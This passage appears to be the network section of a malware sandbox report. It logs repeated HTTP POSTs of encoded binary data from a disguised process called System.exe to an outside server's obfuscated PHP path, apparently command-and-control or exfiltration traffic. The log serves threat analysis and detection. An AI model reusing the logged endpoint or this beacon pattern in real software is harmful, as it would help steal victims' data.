                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:12 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 49884 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:53:12.933610916 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:53:13.285761118 CET | 2600 | OUT | request body (application/octet-stream)
Jan 4, 2025 14:53:13.450690031 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:53:13.582140923 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 49889 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:53:13.816440105 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:53:14.160758972 CET | 2596 | OUT | request body (application/octet-stream)
Jan 4, 2025 14:53:14.311376095 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 49895 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:53:14.322803974 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:53:14.676282883 CET | 1876 | OUT | request body (application/octet-stream)
Jan 4, 2025 14:53:14.840615988 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:53:14.970238924 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:14 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 49896 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:53:14.445543051 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:53:14.801281929 CET | 2600 | OUT | request body (application/octet-stream)
Jan 4, 2025 14:53:14.962734938 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:53:15.090140104 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:14 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 49902 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:53:15.232325077 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2580
                                                                                                    Expect: 100-continue
Jan 4, 2025 14:53:15.582513094 CET | 2580 | OUT | request body (application/octet-stream)
Jan 4, 2025 14:53:15.749661922 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:53:15.878210068 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 49908 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:53:16.005599022 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:53:16.364669085 CET | 2600 | OUT | request body (application/octet-stream)
Jan 4, 2025 14:53:16.531778097 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:53:16.667980909 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:16 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 49909 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:53:16.832006931 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:53:17.176398039 CET | 2596 | OUT | request body (application/octet-stream)
Jan 4, 2025 14:53:17.349109888 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:53:17.482182026 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:17 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 49917 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:53:17.616327047 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
Jan 4, 2025 14:53:17.973148108 CET | 2600 | OUT | request body (application/octet-stream)
Jan 4, 2025 14:53:18.135929108 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 4, 2025 14:53:18.266771078 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:18 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 49923 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 14:53:18.401825905 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:18.754450083 CET | 2600 | OUT | Data Raw: 5c 59 58 59 5e 5c 58 52 5b 59 5a 55 50 59 5b 56 56 55 54 49 52 5a 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \YXY^\XR[YZUPY[VVUTIRZR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^,>>$+"?=?(08X/&Q5("8*4A&#$Y."Y ']/
                                                                                                    Jan 4, 2025 14:53:18.918397903 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:19.046211004 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:18 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    78 | 192.168.2.4 | 49927 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:19.343435049 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:19.691951036 CET | 2600 | OUT | Data Raw: 5c 5a 58 5a 5b 5c 58 56 5b 59 5a 55 50 5d 5b 5b 56 52 54 44 52 59 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZXZ[\XV[YZUP][[VRTDRYRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\98%(:)<+V3/83"-;6(>>(&8Y9"Y ']/0
                                                                                                    Jan 4, 2025 14:53:19.855638981 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:20.190565109 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    79 | 192.168.2.4 | 49933 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:19.979089975 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:20.332509041 CET | 1876 | OUT | Data Raw: 59 5b 58 5a 5e 59 58 5d 5b 59 5a 55 50 5c 5b 5a 56 5d 54 43 52 5a 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y[XZ^YX][YZUP\[ZV]TCRZRQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,>%[%&U>+V$($Y.3%585*=>%4Y:"Y ']/4
                                                                                                    Jan 4, 2025 14:53:20.704212904 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:20.834212065 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:20 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 5b 26 2a 21 0f 26 2e 30 54 3a 05 3a 0a 28 30 3e 41 2e 2e 38 5b 3f 3a 3f 14 2f 55 2f 12 3e 06 21 1a 3e 31 3f 53 25 2f 01 00 28 0c 20 51 03 12 27 5e 32 07 04 59 3d 0a 25 14 2e 07 33 18 21 31 23 5b 27 3a 26 1f 20 2e 3e 04 31 2f 35 1d 2a 2f 2d 54 2c 3e 06 02 2e 0d 34 1f 3f 3f 23 55 0b 1f 26 0d 24 1f 20 50 26 38 30 59 3c 20 16 58 28 3a 06 0f 20 39 20 5d 25 3d 2e 1d 33 0f 36 0d 33 31 32 07 30 33 26 05 23 2d 3b 59 25 10 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"[&*!&.0T::(0>A..8[?:?/U/>!>1?S%/( Q'^2Y=%.3!1#[':& .>1/5*/-T,>.4??#U&$ P&80Y< X(: 9 ]%=.3631203&#-;Y%.S.-W=YL0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    80 | 192.168.2.4 | 49934 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:20.191997051 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:20.551414967 CET | 2600 | OUT | Data Raw: 59 5c 5d 5d 5e 5f 5d 57 5b 59 5a 55 50 5f 5b 50 56 5c 54 47 52 5f 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\]]^_]W[YZUP_[PV\TGR_R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9/&**-3+;W3?; 150"^:)- C%3Z:"Y ']/
                                                                                                    Jan 4, 2025 14:53:20.727958918 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:20.862485886 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:20 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    81 | 192.168.2.4 | 49940 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:20.993215084 CET | 371 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:21.348145962 CET | 2600 | OUT | Data Raw: 59 50 5d 5b 5b 5e 58 53 5b 59 5a 55 50 59 5b 5a 56 54 54 43 52 59 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YP][[^XS[YZUPY[ZVTTCRYRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^..)1->#+T3;/Q!-'V5^!*#&8Y."Y ']/
                                                                                                    Jan 4, 2025 14:53:21.520750046 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:21.651735067 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:21 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    82 | 192.168.2.4 | 49946 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:22.172946930 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:22.520030975 CET | 2600 | OUT | Data Raw: 5c 5e 58 5d 5b 55 58 57 5b 59 5a 55 50 5d 5b 56 56 56 54 49 52 5e 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \^X][UXW[YZUP][VVVTIR^RYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;>9^&(.Q=- ^+-$88^/1 =("8"=>13-"Y ']/0
                                                                                                    Jan 4, 2025 14:53:22.842766047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:22.976479053 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:22 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    83 | 192.168.2.4 | 49952 | 154.29.71.9 | 80 | 5796 | C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Jan 4, 2025 14:53:23.101006985 CET | 395 | OUT | POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:23.457674026 CET | 2600 | OUT | Data Raw: 59 50 58 58 5e 5c 5d 54 5b 59 5a 55 50 5b 5b 57 56 5c 54 47 52 5d 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YPXX^\]T[YZUP[[WV\TGR]RPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;-![%^9>[;(>('8<83)"!;:>X(& ;."Y ']/(
                                                                                                    Jan 4, 2025 14:53:23.673592091 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:23.807831049 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:23 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
